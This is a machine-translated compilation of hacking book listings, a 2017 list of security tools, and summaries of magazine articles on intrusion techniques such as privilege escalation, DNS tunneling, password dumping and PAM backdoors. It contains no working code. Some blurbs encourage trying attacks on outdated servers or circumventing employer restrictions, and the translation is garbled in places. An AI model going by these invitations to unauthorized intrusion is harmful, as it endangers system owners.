• Hacker utilities for Android and iPhone. Choosing a computer and operating system for a hacker

    This is, in my opinion, the best brochure-style guide on SQL injection. The volume of material discussed in the manual is simply enormous! Nothing superfluous, no “pouring water”, everything is clear and structured.

    Introduction to Web Application Security
    -Classical vulnerability exploitation technique, injection of SQL statements (SQL Injection)
    -Blind SQL Injection
    -Working with the file system and executing commands on the server when exploiting the SQL Injection vulnerability
    -Methods for bypassing software security filters
    -Methods for bypassing Web Application Firewall (WAF)


    The art of hacking and protecting systems
    The book covers different types of software: operating systems, databases, Internet servers etc. Numerous examples show exactly how to find vulnerabilities in software. The topic is especially relevant since software security is currently receiving more and more attention in the computer industry.

    Year of issue: 2006
    Language: Russian

    A guide for beginner hackers and more
    This manual consists of 3 books:
    1. Hacking from the very beginning: methods and secrets
    2. Intelligent guidance hacking And phreaking
    3. Guide for hackers

    Year of issue: 2006
    Language: Russian

    Hacking and customizing Linux. 100 Pro Tips and Tools
    The book is collection of professional advice, allowing to increase work efficiency servers under control Linux OS.
    Topics covered: Basics servers, version control of control files and their backup, networking, work monitoring servers, information security issues, writing scripts in language Perl, as well as the three most important programs under OS Linux - Bind 9, MySQL And Apache.
    The book is intended for network administrators various levels, as well as users Linux OS who want to explore the capabilities of this operating system in more depth.
    Year of issue: 2006
    Language: Russian

    Hacking techniques - sockets, exploits, shell code
    In his new book, James Foster, the author of several best-selling books, describes for the first time the methods used hackers For attacks on operating systems and application programs. He gives examples of working code in languages C/C++, Java, Perl And NASL, which illustrate methods for detecting and protecting against the most dangerous attacks. The book sets out in detail issues that are essential for any programmer working in the field of information security: socket programming, shell codes, portable applications and writing principles exploits.
    After reading this book, you will learn:
    Develop independently shell code;
    Transfer published exploits to another platform;
    Modify COM objects to suit your needs Windows;
    Improve the Web crawler Nikto;
    Understand exploit"doomsday";
    Write scripts in language NASL;
    Identify and attack vulnerabilities;
    Program at level sockets.
    Year of issue: 2006
    Language: Russian

    Anti-hacker. Computer network protection tools
    Are being considered: means of support security And analysis systems; funds for attacks And research systems on the network; system and network tools audit, as well as tools used in judicial practice and in the investigation of incidents related to hacking of computer systems. For IT professionals.

    Year of issue: 2003
    Language: Russian

    Hacking Windows XP
    The book is a selection of the best chapters about hacking Windows XP, as well as providing system security"from" and "to". Just a huge manual about hidden settings Windows XP, her optimization, command line, register and about much more in an accessible and understandable form for young people hackers and for those people who want to protect themselves from possible threats.
    Book high level and in successful execution.
    Year of issue: 2004
    Language: English

    Hacking. The Art of Exploitation
    This is not a catalog exploits, A training manual basics hacking, built on examples. It details what everyone should know hacker and, more importantly, what everyone should be aware of security specialist to take measures that will not allow hacker make a successful attack. The reader will need good technical training and full concentration, especially when studying code examples. But it is very interesting and will allow you to learn a lot. About how to create exploits by using buffer overflow or format strings how to write your own polymorphic shellcode in the displayed symbols, how to overcome the execution ban in stack by returning to libc how to redirect network traffic , hide open ports and intercept connections TCP how to decrypt wireless protocol data 802.11b using attack FMS.
    The author looks at hacking as the art of creative problem solving. It refutes the common negative stereotype associated with the word "hacker", and puts the spirit first hacking and serious knowledge.
    Year of issue: 2005
    Language: Russian

    Collection of books and articles by Chris Kaspersky
    Excerpts: "We live in a harsh world. The software around us contains holes, many of which are the size of elephants. The holes are filled with hackers, viruses and worms, raiding from all corners of the network. The vast majority of remote attacks are carried out by buffer overflow(buffer overfull/overrun/overflow), a special case of which is stack overflow. One who owns technology buffer overflows, rules the world! If you want a guide to the land of overflowing buffers, equipped with comprehensive guide on survival - this book is for you! Open the doors to the amazing world behind the façade high level programming, where those gears rotate that set everything else in motion.
    Why are overflow errors fundamental? What can you do with them? How to find a vulnerable buffer? What restrictions does it impose on shell code? How can these limitations be overcome? How to compile shell code? How to send it to a remote node and remain unnoticed? How to bypass a firewall? How to catch and analyze someone else's shell code? How to protect your programs from overflow errors?
    It's no secret that antivirus industry is a closed “club” that holds information intended only for “its own people.” This is partly done for security reasons, partly because the pernicious spirit of competition makes itself felt. This book partially lifts the curtain of secrecy..."
    Books:

    Code Optimization Effective Memory Usage
    HACKER DISASSEMBLING UNCOVERED (Draft)
    Portable shell-coding under NT and linux
    Portable shell-coding under NT and linux! (eng)
    Portable shell-coding under NT and linux (rus), 2 chapters
    Researcher's Notes computer viruses
    Notes of a computer virus researcher 2, fragment
    Notes from mice
    IDA Mindset
    Debugging without source code
    Amendments
    Mental disassembly technique (excerpt from Techniques and Philosophy of Hacking Attacks)
    CD protection techniques
    Program optimization technique
    Network attack technique
    Shrinking the Internet
    Hacking Fundamentals


    Articles:

    $100,000 per week without expenses or gestures
    blue pill-red pill - the matrix has windows longhorn
    Hidden potential of manual assemblies
    Obj files on the trestle bed or
    On-line patching in secrets and tips
    Rak counterfeit CRC16-32
    SEH at the service of the counter-revolution
    TOP10 software defender errors
    Unformat for NTFS
    Windows on one floppy disk
    Hardware virtualization or emulation without brakes
    Archaeological site of vista-longhorn core
    Archive of old articles
    x86-64 architecture under the assembler's scalpel
    Assembly - extreme optimization
    Assembly language is easy
    Assembly puzzles or whether a machine can understand natural language
    Assembly perversions - stretching the stack
    Assembly without secrets
    Audit and disassembly of exploits
    Database under attack
    Combating resource leaks and overflowing buffers at the linguistic and extra-linguistic level
    All Chris Kaspersky
    Eternal life in DIY games
    Hack patch-guard
    Hacking and protecting WebMoney
    Hacking TVs up close and at a distance
    Burglary through cover
    War of the Worlds - Assembler vs C
    War of the Worlds - assembler vs si
    CD recovery
    NTFS recovery - do-it-yourself undelete
    Data recovery on NTFS partitions
    Recovering deleted files under BSD
    Recovering deleted files under Linux
    Data recovery from laser discs
    The rebirth of lost data - recovery of deleted files under LINUX
    survival in systems with brutal quotas
    Race to extinction, ninety-five survive
    extracting information from pdf files or hacking eBooks with your own hands
    Life after BSOD
    Notes on hard drive data recovery
    Capturing and releasing hostages in executable files
    Capturing other people's botnets
    Capturing ring 0 in Linux
    Protecting games from hacking
    Protected axis without antiviruses and brakes
    Star power turns to dust
    Learning English Turbocharged
    Linux kernel research
    How to customize an exploit for yourself
    How CRC16 and 32 are counterfeited
    Counterintelligence with soft-ice in hands
    Borderless copying or advanced CD protection techniques or copy-resistant CDs
    Who's Who of Asians
    Manual therapy of non-traditional self-control
    Metaphysics of wmf files
    Multi-core processors and problems caused by them
    The power and pitfalls of automatic optimization
    Obituary on Web-Money Keeper Classic
    Poor choice of priorities on the PDP-11 and its legacy on C
    Obfuscation and overcoming it
    Fusion Debugging Basics with linice
    Features of disassembly under LINUX using tiny-crackme as an example
    BIOS patch
    Buffer overflow on systems with a non-executable stack
    Overflowing buffers are active defenses
    Intercepting library functions in linux and bsd
    Escape from vm ware
    Escape through the firewall
    diving into gdb technique and philosophy or debugging binary files under gdb
    Do-it-yourself polymorphic generator
    Following in the footsteps of MS IE OBJECT tag exploit
    Overcoming firewalls from the outside and inside
    Kernel ghosts or stealth modules
    Programming - with or without a wife
    Programming in machine codes or soft-ice as a logger
    Hide and seek in linux
    Overclocking NTFS
    Overclocking and braking Windows NT
    Overclocking mice or high-speed web surfing for extreme sports enthusiasts
    The real philosophy of a non-existent world
    Repair and restoration of hard disks
    Manual Trojanization of applications under Windows
    Fishing on a local network - sniffering
    Crackme, hiding code on API functions
    Ultra-fast import of API functions
    Secrets of assembling disassembler listings
    Secrets of kernel hacking
    Secrets of conquering the elves
    Cool tricks from the mouse
    Speed ​​scam
    Hidden features of DSL modems
    Comparison of assembly translators
    Old anti-debugging techniques in a new way
    Is it open source?
    Techniques for surviving in troubled waters or how to wear antivirus shoes
    Optimization techniques for Linux, comparison of gcc and inel c (part 1)
    Optimization techniques for Linux, comparison of gcc and inel c (part 2)
    Optimization techniques for Linux, comparison of gcc and inel c (part 3)
    Optimization technique for Linux
    Technique for dumping protected applications
    Turbo driver transfer from Windows to LINUX-BSD
    Universal malware detection method
    Executable file packers for LINUX-BSD
    NTFS file system from outside and inside
    Hacker tricks or how to put a breakpoint on jmp eax
    Hackers love honey"
    NT Kernel Hack
    Six sins of malware writers
    Syringe for bsd or functions on the needle
    Expert opinion - email security
    Extreme CPU overclocking
    Electronic money - to trust or not
    Elves big and small

    A selection of 10 great tools for beginners and experienced hackers. Learning these tools will help you improve your hacking knowledge!

    Summary: Fossbytes has compiled a list of useful resources for hacking in 2017. This list is based on reviews of major organizations, your feedback and your own experience. As you explore these resources, you'll learn about the best hacking software using port scanners, web vulnerability hackers, password crackers, forensic tools, and applied sociology tools.

    Disclaimer: The publication of this article on the Fossbytes portal is not an advertisement for malware and is for educational purposes only.

    1. Metasploit

    Metasploit is more than just a collection of tools for creating exploits, I would call Metasploit a framework that you can use to create your own tools. This free tool is one of the most popular information security tools that allows you to find vulnerabilities on various platforms. Metasploit has over 200,000 users and employees who can help you get the information you need and identify vulnerabilities in your system.

    This 2017 hacking tools package will give you the ability to imitate real hacker attacks to identify vulnerabilities. A test of tamper resistance is to identify vulnerabilities through integration with the Nexpose automated scanner using error reporting. Using the open Metasploit framework, users will be able to create their own hacking tools.

    Metasploit is supported on all major platforms, including Windows, Linux, and OS X.

    2. Acunetix WVS

    Acunetix is ​​a web vulnerability scanner that scans and identifies flaws in web pages that lead to fatal errors. This multi-threaded application carefully crawls web pages to detect malicious SQL injections, cross-site scripting and other vulnerabilities. Acunetix is ​​a fast and easy to use tool that is used to scan websites created with using WordPress. During work with this platform, more than 1,200 vulnerabilities were identified.

    Acunetix includes a Login Sequence Recorder feature that allows you to access password-protected areas of the site. New technology The AcuSensor used in this tool reduces the percentage of false positives. All these features make Acunetix WVS an excellent hacking tool in 2017.

    Acunetix is ​​available on Windows XP and higher platforms.

    3. Nmap

    Nmap also known as Network Mapper belongs to the category of port scanning tools. This free hacking tool is the most popular port scanner, providing effective network discovery and security monitoring. Used for a wide range of services, Nmap uses Raw IP packets to determine the hosts available on the network, their services, and detailed information, operating systems, firewall types and other information.

    Over the past year, Nmap has won several security awards and has been featured in films such as The Matrix Reloaded, Die Hard 4, and others. Nmap has both console support and an application with graphical interface.

    Nmap is supported on all major platforms, including Windows, Linux, and OS X.

    4. Wireshark

    Wireshark is a well-known professional tool that allows you to detect vulnerabilities within a network and among a variety of firewall rules. protective screen. Wireshark is used by thousands of security professionals to analyze networks, capture sent packets, and thoroughly scan hundreds of protocols. Wireshark helps you read real-time data from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and other sources.

    The original name of this free tool is Ethereal. Wireshark has command line support, this version is called TShark.

    Wireshark is supported on all major platforms, including Windows, Linux, and OS X.

    5. oclHashcat

    If cracking passwords is a common thing for you, then you must be familiar with Hashcat password cracking tools. While Hashcat is CPU based, oclHashcat is an advanced version that uses GPU to crack passwords.

    oclHashcat bills itself as the world's fastest password cracking tool with the world's only GPGPU-based engine. To use oclHashcat, users with NVIDIA video cards must have software ForceWare version 346.59 or higher, and users AMD video cards Catalyst software version 15.7 or later is required.

    This tool uses the following attack modes for hacking:

    • Straight
    • Combined
    • Brute force
    • Hybrid dictionary + mask
    • Hybrid mask + dictionary

    Let's remember another important feature: oclHashcat is an open-source tool. source code MIT licensed, allowing easy integration or packaging with standard Linux distributions.

    oclHashcat is supported on all major platforms, including Windows, Linux, and OS X.

    6. Nessus Vulnerability Scanner

    This is the best free tool of 2017, running on a client-server framework. This tool was developed by Tenable Network Security and is one of the most popular vulnerability scanners. Nessus provides solutions for various purposes for different types users – Nessus Home, Nessus Professional, Nessus Manager and Nessus Cloud.

    Nessus can scan for several types of vulnerabilities, which include remote access defect detection, configuration error alerts, TCP/IP denial of service, PCI DSS revision preparation, malware detection, personal data search, etc. To launch a dictionary attack, Nessus can turn to an external tool called Hydra.

    In addition to the basic functionality mentioned above, Nessus can be used to scan multiple IPv4, IPv6, and hybrid networks. You can conduct a scheduled scan at a time convenient for you, and you can also perform a full rescan or partial scan of previously scanned hosts using the partial scan feature.

    Nessus is supported on a variety of platforms, including Windows 7 and 8, Mac OS X and popular Linux distributions such as Debian, Ubuntu, Kali Linux, etc.

    7.Maltego

    Maltego is an open source forensics platform that offers rigorous mining and information gathering to build a picture of the cyberattacks around you. Maltego excels in representing the complexity and severity of failure points in your infrastructure and environment.

    Maltego is a great hacker tool that analyzes between real world links and people, companies, web pages, domains, DNS servers, IP addresses, documents and anything else you want. This tool is built in Java and has an easy-to-use graphical interface with the ability to reset settings during scanning.

    Maltego is supported on all major platforms, including Windows, Linux, and OS X.

    8. Social-Engineer Toolkit

    Featured in Mr. Robot, TrustedSec's Social-Engineer Toolkit is an advanced framework that simulates several types of attacks in the field of social engineering, such as credential harvesting, phishing attacks, etc. At the Elliot exhibition, you can see that the SMS spoofing feature from the Social-Engineer Toolkit is being used.

    The tool is written in Python and is the standard for social engineering tamper testing with over two million downloads. It automates attacks and generates hidden emails, malicious web pages, etc.

    To install on Linux, enter the following command:

    git clone https://github.com/trustedsec/social-engineer-toolkit/set/

    In addition to Linux, Social-Engineer Toolkit has partial support on Mac OS X and Windows.

    9. Netsparker

    Netsparker is a popular web application scanner that finds vulnerabilities such as SQL injections and local file inductions, suggesting corrective actions in a secure and write-protected manner. Since this hacking tool generates the results of exploitation, you do not need to conduct additional vulnerability checks. Only in this case, Netsparker will not be able to check for vulnerabilities automatically, but it will notify you about it. Getting started with this scanner is very easy, just enter the URL and let Netsparker do the scanning. Netsparker has support for JavaScript and AJAX applications. So you don't have to configure your scanner or rely on any complicated scanning app settings various types web applications.

    If you do not want to pay for the professional version of Netsparker, you can use the demo version of this application.

    Netsparker is only available on Windows.

    10. w3af

    w3af is a free web application security scanner widely used by hackers and security testers. w3af stands for Web Application Attacks and Framework Inspection. By using this hacking tool, you will be able to obtain information about vulnerabilities and later use it when conducting penetration tests. The creators of w3af claim that their tool is able to identify more than 200 vulnerabilities (including vulnerabilities such as cross-site scripting, SQL injection, incorrect PHP configuration, poorly protected credentials and unhandled application errors) and make web applications (web pages) more secure .

    w3af has command line support and a GUI application. In less than 5 clicks, using a pre-installed profile for beginners, you can conduct a security check of a web application. This tool has good documentation, so new users can easily understand w3af. Since it is an open source tool, experienced developers will be able to add new features and create something new based on w3af.

    w3af is available on Linux, BSD, and OS X. There is also support on Windows, but earlier versions.

    Other top security and hacking tools of 2017, broken down by category:

    Scanners webvulnerabilities: Burp Suite, Firebug, AppScan, OWASP Zed, Paros Proxy, Nikto, Grendel-Scan

    Tools For operation vulnerabilities: Netsparker, sqlmap, Core Impact, WebGoat, BeEF

    Forensic tools: Helix3 Pro, EnCase, Autopsy

    Scanners ports: Unicornscan, NetScanTools, Angry IP Scanner

    Tools monitoring traffic: Nagios, Ntop, Splunk, Ngrep, Argus

    Debuggers: IDA Pro, WinDbg, Immunity Debugger, GDB

    Rootkit detectors: DumpSec, Tripwire, HijackThis

    Tools encryption: KeePass, OpenSSL, OpenSSH/PuTTY/SSH, Tor

    Tools By hacking passwords: John the Ripper, Aircrack, Hydra, ophcrack

    We hope this list the best hacking and security tools of 2017 was useful for you.

    If we wanted to make a book based on the coolest hacking articles published in our magazine, it would be so thick that if we stacked all the published volumes on top of each other, the resulting tower would be as tall as the Burj Khalifa. Okay, okay, “that’s not accurate” :). After all, why publish historical articles that have lost their relevance? Instead, we will collect in one material the coolest texts on information security that have been published over the past few years and that you might have missed.

    In the last issue, we made a selection on , which was primarily of interest to programmers, reversers and software engineers. Today we present to your attention articles devoted primarily to the hacker craft - everything related to hacking the OS, DBMS, penetration testing of IT infrastructure, OS and application software vulnerabilities. You will also find half-forgotten or little-known features and tricks that will be useful in practice if you are truly devoted to our cause! Please note: just listing these articles would take up six full pages of the old paper “Hacker”. 🙂

    Forensic memory analysis. Examining processes in Windows 7

    After a hack or data leak, when the incident has already happened and it cannot be silenced :), forensic scientists get involved in the case computer security, or, as they are often called, forensic experts. In search of the “patient zero” through whom the hack occurred, they have to collect and analyze evidence. In this article you will get to know some RAM analysis techniques, researching Windows processes, ways to identify rootkits that use undocumented features of the NT kernel, and learn some little-known coding tricks.

    The material will be useful to anyone involved in or simply interested in forensics.

    Manual resuscitation of a memory dump. Manual Memory Recovery Guide


    A common situation: the code is securely packaged and in order to analyze the program or malware you have to take a memory dump and then manually pick it out with other tools. But there is a problem - the dump taken may turn out to be broken, that is, unsuitable for analysis. And what to do in this case? Just in this article, my friend, they will tell you how competently dump an image from memory and how to restore it if it is damaged. If you are a reverse engineer or a forensics expert, believe me, this will definitely come in handy someday!

    Laboratory workshop on Metasploit Framework. Hidden tricks of MSF



    Who doesn't know MSF? This " swiss knife"is one of the five most used tools by pentesters, and just any more or less advanced security specialist. The tool is constantly being developed and updated, many new features and little-known options appear that are easy to miss, but they really expand the capabilities or make the work much more convenient and comfortable. Automation of frequently repeated operations also plays an important role. The presented material will talk about some of the features of MSF, more or less advanced built-in capabilities of the tool, as well as the possibilities of automating routine operations, which will save you a lot of time. You simply must know this!

    Meterpreter in action. Tricky Tricks via MSF



    Those who have at least somehow immersed themselves in the topic of working with the Metasploit Framework know how many opportunities a correctly forwarded “payload” provides on a vulnerable machine. We are talking about Meterpreter, a universal advanced payload - both what is included there and what we can add manually. You will learn how to use payload correctly and effectively for your benefit, what features Meterpreter has, and of course, you will be able to test all this in practice. In conjunction with the previous article about the Metasploit Framework, this turns out to be a real must-read for a beginner or a slightly more advanced pentester.

    DNS Feedback. We bypass barriers and organize access to the Network


    So, you got to a vulnerable machine in corporate network large company. However, the firewall cuts off all unknown connections, and the list of ports to which you can connect is fixed. Accordingly, Reverse tcp shell and especially bind tcp shell will no longer work. And will our machine really remain out of reach? This is where the trick of encapsulating the connection into the legitimate DNS traffic of the vulnerable machine will come to your aid. Do you think it's difficult? In the material, they will tell you about DNS and how you can play with GET/POST requests in order to quietly penetrate the corporate perimeter.

    DNS: feedback. Advanced payload for tunneling



    What if the vulnerable machine does not have access to the Internet at all or the traffic filtering rules are so strict that it is impossible to create a tunnel as described in the previous material? The second part of the article on DNS tunneling explains how to solve this problem using more clever and sophisticated techniques. You will learn how to modify the shell in such a way that it receives control commands wrapped inside service traffic, how to set up a bot that performs all this routine, and, in fact, how to use all this to gain access to the car we need.

    DNS attacks: yesterday, today, tomorrow. Ghost Domain Names and other 0day methods to hack the domain name system



    Have you heard about DNS attacks? The once sensational Ghost Domain Names attack has a chance of being implemented now. About her and other methods of attacking domain system is discussed in this article.

    Don't believe your eyes. Current spoofing methods today



    The heyday of spoofing attacks occurred in historical times by today's standards. However, to this day there are still methods and tools that allow you to successfully replace objects in a network segment. This is a rather risky part of attacks, for example on remote banking systems, and is also often used in template pentests. From this article you will understand how easy it is to carry out a spoofing attack and what this can lead to in the future.

    Not enough rights? Enough: 8 tricks to bypass group policies in a domain



    Do you feel like a guest on your work laptop? Do you dream of customizing your desktop, browser, network and update system for yourself? We present to your attention a set of eight tricks that allow you to somehow bypass the application of domain group policies. Of course, some of the techniques may no longer work on 10, but old versions of Windows (XP - 7) are still alive on corporate machines, and many old bugs still work. The article provides a set of ready-to-use recipes; you can try them on your computer and prove to admins that GPO is not as good as it is praised.

    We're going for a promotion. Recipes for raising privileges under Windows



    We continue the topic of trepanning Windows. When you perform a pentest or penetrate for other purposes, for example, an Active Directory domain, a machine on which a website is hosted, or an accountant’s workplace with 1C, you will almost certainly be faced with the task of raising your privileges. For her decision will determine whether you can move forward or not. This article describes everything (or almost everything) related to moving up in Windows systems - eleven techniques that will help you go from guest to local or domain administrator.

    Domain attacks. Taking over the corporate network



    The vast majority of companies for the custom corporate sector use Windows base Server and the Active Directory directory service, even if the rest of their racks are filled to capacity with cars with *NIXs. Therefore, control over a domain is a tasty morsel for any hacker or pentester. Accordingly, you cannot do without administrator privileges. But how to get them is what we will talk about in this article. Vulnerabilities in network services and OS, holes in the network architecture and authentication problems, SMB Relay and timeless ARP spoofing... Must read for everyone interested in pentests.

    Give back the rights! How to bypass restrictions on a work computer



    Another material on the topic of obtaining administrator rights on a local or network machine. There are a lot of recipes and techniques given, so even if some don’t work, there is still a chance of success. Both “insider” flash drives and loading from hidden section, using alternate NTFS streams to bypass file permissions. Quite a lot of attention is paid to activating prohibited USB ports. In addition, you will learn about tricks with shortcuts, deflating group policies, and bypassing bans on running software that is not included in the white lists. How do you like this set? You will definitely find something for yourself, and a pentester should definitely study it.

    We study and open BitLocker. How does Windows disk protection work and what is needed to hack it?



    Encryption of local drives and removable media is one of the fundamentals of ensuring Windows security, declared by its developers. Moving away from marketing promises and PR, how reliable is the technology? After all, it is very often used in the corporate sector by default.
    In this article we will take a detailed look at the device of different versions of BitLocker (including those pre-installed in the latest Windows builds 10) and, of course, we will show how to bypass this built-in protection mechanism. And whether to use BitLocker after this or not is up to you to decide.

    7 recipes for preparing Windows passwords. How to dump and use password hashes from Windows accounts



    Once upon a time, in the old days, dumping and then brute force passwords from admin accounts was a surefire and very popular way to gain administrative privileges. Now, with the development of other protection mechanisms, the topic has become somewhat outdated, but is still alive!

    The article provides a complete collection of recipes describing how to dump user password hashes, restore the original pass using brute force (brute force) and use the extracted hash to gain access to protected resources using flaws in the NTLM authentication protocol. And the value of the material is that it contains a minimum of theory - only practice. A real case for a pentester!

    Don't rub salt in my password. Reanimating a dead MD5



    We have already talked in detail in the previous article about hacking passwords for accounts on Windows machines. Continuing the topic, let's talk about the so-called salted hashes, which require a slightly different approach to crack. We will mainly talk about the MD5 algorithm, its shortcomings - the appearance of collisions (repetitions) and how this can be used for successful brute force. If you are a coder and are ready to write scripts to exploit flaws in MD5, this material is definitely for you!

    Anonymous attack on Windows. Tricky tricks of a seasoned hacker



    The article takes us back to the era of operating systems from XP to Vista, showing how, with the help of long-known, but still working features, you can get a list of users through a zero session, capture an RDP terminal connection and what can be configured in system registry to protect yourself from unwanted eyes and playful hands.

    Steal in 60 seconds. Remote Dedik mining method running Windows



    Have you ever dreamed of taking over someone else's server and feeling like a god? 🙂 The material contains real advice on how to hijack a remote server using the same MSF and several types of shell in the Meterpreter format. Of course, a patch for this vulnerability has long been released, but, as you know, you can still find cars on the Internet running an outdated or unupdated OS. Armed with information after reading the article, you can try your strength and luck. What if?

    Hacking script. We analyze typical attack scenarios on corporate networks



    This article is based on many years of experience of pentesters from Positive Technologies, who annually perform hundreds of penetration tests for major companies both in Russia and abroad. During this time, experts have accumulated large number typical situations and general cases telling about the most typical scenarios of successful attacks, which made it possible to gain control over the customer’s network in 80% of cases. The material discusses common mistakes and general options hacking companies. By reading the article, you will be able to analyze how secure your network is, and if you are a pentester yourself, you will receive a set of ready-to-use scripts.

    We measure vulnerabilities. Classifiers and metrics of computer flaws



    Lately More and more often you hear the phrases: “There is a vulnerability, there is a vulnerability, a gap was found in this software, a hole in that service.” And for each such vulnerability, a bulletin is issued that describes the problem itself, recommendations from developers, and other measures that you can take to protect yourself. All this information is published on bug tracks, special sites that collect information about vulnerabilities. Anyone can get acquainted with this information, and more enterprising people can always buy an exploit for this vulnerability or a ready-made attack tool on the black market. When you read reviews like this, you probably noticed that each bug is classified in a certain way. What is “vulnerability measurement”, what criteria are used to measure it, and why do you need to know it at all? You will find the answers in this article.

    Depraved programming. ROP tricks that lead to victory



    When delving into the topic of vulnerabilities and exploits, you can often hear about a “buffer overflow,” as a result of which it is then possible to execute arbitrary code on the victim’s system. So, this bug can be created purposefully, for example, using the reverse method oriented programming, or ROP. This technique, using freed memory functions, format string errors, and so on, will help deal with DEP and even ASLR protection mechanisms. An exploit that spreads malware and exploits a vulnerability in Acrobat Reader (CVE-2010-0188) is a prime example of this. Additionally, this same method was once used by pwn2own to hack an iPhone and in an exploit against PHP 6.0 DEV. How to do this - read in this article.

    Exploit "on the knee". We write an exploit using improvised means



    Any advanced pentester sooner or later has to face the task of creating an exploit for a specific service or system. Although there is a lot of theoretical material, there is still a lack of practical and understandable examples. In this article, the task was to write a working exploit for specific program. We will look at all the intricacies and try to understand exactly how vulnerabilities are found and successfully exploited. If you are a reverse engineer or a pentester, this is a must read!

    We pick at the armor of Windows. Let's find out what ACL/DACL is and how it can be exploited



    The security of the NTFS file system is based on access control lists, also known as ACLs, and based on it system list file permission management. Despite the fact that NTFS shows itself to be a very persistent FS, as Malchish-Kibalchish said, “the Russians have secret passages, and you can’t fill them up.” After all, if you bypass ACL restrictions, a hacker can gain privileged access to absolutely any files, including system files, which already poses serious risks. The material reveals the theory of ACL/DACL, tells what you can tinker with here, and, of course, looks at examples of how the flaws found can be exploited to your advantage.

    Taming the wild pussy, or leaking passwords with suitcases. Hacking routers through SNMP flaws



    It's no secret that Cisco is the most popular network equipment vendor. And therefore, there is no need to prove that the vast majority of companies will use switches and routers from this manufacturer as the basis of the network, or at least the core. It is logical that any critical error in their firmware can jeopardize normal work and connectivity not only of the corporate network, but also of particularly important segments of the Internet. The article talks about several Cisco vulnerabilities that you simply must know about - from hacking a router via SNMP to leaking passwords through a GRE tunnel.

    Bluetooth tricks. Little tricks for using the “blue tooth”



    In the old days, when everyone didn’t have practically unlimited Internet on their phone, people actively exchanged files via Bluetooth. Blue tooth, it’s just that now it has a slightly different purpose - communication between various wearable devices and in the world of the Internet of things.

    What does all this mean for a hacker? Having the right tool on your smartphone or tablet, you can work real miracles - we intercept remote communication and control someone else’s device, sniff out traffic, find invisible devices and even DDoS devices detected nearby.

    Master class on resuscitation of nixes. Methods for dealing with Linux and FreeBSD failures



    UNIX has long proven itself to be a reliable and predictable system. But it happens that after a system error or other failure, the further fate of the operating system depends entirely on the qualifications of its owner. UNIX's design is so simple and straightforward that the OS can be lifted off its knees, no matter what state it is in. The material discusses the most typical and common crash situations of *NIX systems: a worn out MBR record and forgotten password root, freezes and spontaneous reboot OS, kernel panic, hard drive failure, incorrect setting xorg.conf, missing video driver, incorrect configuration network interfaces, broken DNS resolution - and recipes for eliminating them and restoring functionality are given.

    How to become ssh-friendly. Full-guide on using Secure Shell



    SSH is de facto the most popular and frequently used remote access protocol for Linux. Is it necessary to talk about the degree of reliability and security of the protocol through which the administrator connects to the server? But in addition to security settings, SSH has a bunch of options that will make working in the terminal more comfortable, enjoyable and faster. The article contains the most complete manual on correct use Secure Shell one hundred percent.

    The evil legacy of Windows. Conceptual methods of hacking Linux via a flash drive and protection against them



    What Windows user doesn’t remember troubles with flash drives and the annoying virus from Autorun? Linux users have always looked down on this problem, saying it doesn't concern them. This is partly true, but not everything is as smooth as we would like. Penguin had its own problems - this is .autorun, similar in functionality, a flaw Adobe Acrobat Reader with fonts, as a result of which you can run anything in Nautilus, buggy drivers that incorrectly process removable media, and features that allow you to bypass security mechanisms such as AppArmor, ASLR, PIE and NX bits. Already interested? Then read the material and you will find out how it was.

    *NIX backdoor of instant preparation. We implement into the authentication system of Linux, BSD and macOS


    After the task of penetrating the car has been completed, it is necessary to somehow gain a foothold on it without arousing suspicion. For example, create new account or infect the victim with some kind of backdoor, which, like a faithful servant, will wait for commands to be executed from the owner. Even though *NIX systems are much more secure than other platforms, there is a very easy to implement and fairly secretive method that surprisingly few people know about. This is a modification of the PAM authentication system modules, which is used by all modern UNIX systems. The material provides a theory on PAM modules, an example of C++ code for writing your own backdoor, and techniques for integrating it into legal authentication modules.

    Attacks on Tomcat. We study common attack methods on Apache Tomcat and ways to counter them


    Apache Tomcat is the leader in the number of installations on servers and distribution in the world. It ranks sixth in popularity among web servers in the W3Techs ranking, which, of course, automatically makes it an attractive target for attackers. The default settings do not allow you to withstand common attack methods, so the material contains specific recipes and recommendations used both for testing for the possibility of hacking and for countering attackers who encroach on your shrine.

    We flex our muscles. Methods and tools for hacking MySQL databases


    It's no secret that MySQL is one of the most common DBMS. It can be found everywhere, which is why database security is very important: if an attacker gains access to the database, then there is a high risk that not only will all the information be lost, but the attacker will also lose the entire resource. This material contains up-to-date information on the algorithm for hacking and post-exploitation of MySQL, all the most commonly used tricks and techniques, including those from the arsenal of pentesters. After reading it, someone will repeat the theory again, and someone will learn something new. So go for it!

    Attack on the Oracle. Detailed guide to attack vectors on Oracle DB


    Needless to say, Oracle is a top and widely used DBMS? All the most valuable data, from financial transactions to the results of military experiments or modeling of space objects, circulates in its depths. Like its younger brother MySQL, this DBMS is a real tasty morsel for a hacker, and any pentester will not bypass it. The article presents the most important and most typical vectors of attacks on tables and program code bases Oracle data- hacking of user accounts, execution of arbitrary code, injections into requests, scheduler bugs and much more. All sections are provided with visual illustrations and code examples. So, if you are involved in pentesting and/or are interested in internal device Oracle, be sure to open it.

    Blind injections. Exotic rough injection


    While researching the topic of DBMS security, I came across an old but interesting material on the use of injections in SQL queries. The material describes tricks that may someday be useful to you in practice. At the very beginning of the article, the necessary theoretical foundations SQL, such as functions and query structure, then illustrates tricks using NULL, prequeries to identify potential holes, INSERT tricks, and provides a general example of using the entire described arsenal. Having trained on a training database using these techniques, you can confidently begin testing a real database almost automatically, that is, as the title of the article says, blindly!

    Hacking is finding vulnerabilities in a network or computer in order to gain access. Becoming a hacker is not easy, and in this article we will cover the basics.

    To become a hacker, you need deep knowledge of programming languages, hacking methods, searching for vulnerabilities, network design, operating systems, etc. You must also have a creative type of thinking. You must quickly adapt to the situation, find non-standard solutions, be creative.

    While the skills described above can be developed over time, understanding, for example, MySQL or learning how to work with PGP encryption requires a lot of learning. And for a long time.

    To become a hacker you need:

    Learn and use a UNIX system, such as Ubuntu or MacOS

    Initially, UNIX systems were intended for programmers developing software, and not for users who are not related to the IT field. UNIX systems are systems on which almost the entire Internet runs, since they are mainly used as a server (most often Debian and Ubuntu). You can't become a hacker without learning them and learning how to use a terminal.

    For Windows users

    If you use Windows, there is good news for you: there is no need to delete your current system and format the disk. There are several options for working with Linux:

    1. Learn VirtualBox (an operating system emulator program). After studying it, you will be able to run the operating system in operating system. It sounds scary, but the program can be very useful.
    2. Install Linux next to Windows. If you do everything correctly, system bootloaders will not conflict. This is done quite simply: there are many manuals on the Internet.

    Learn HTML markup language

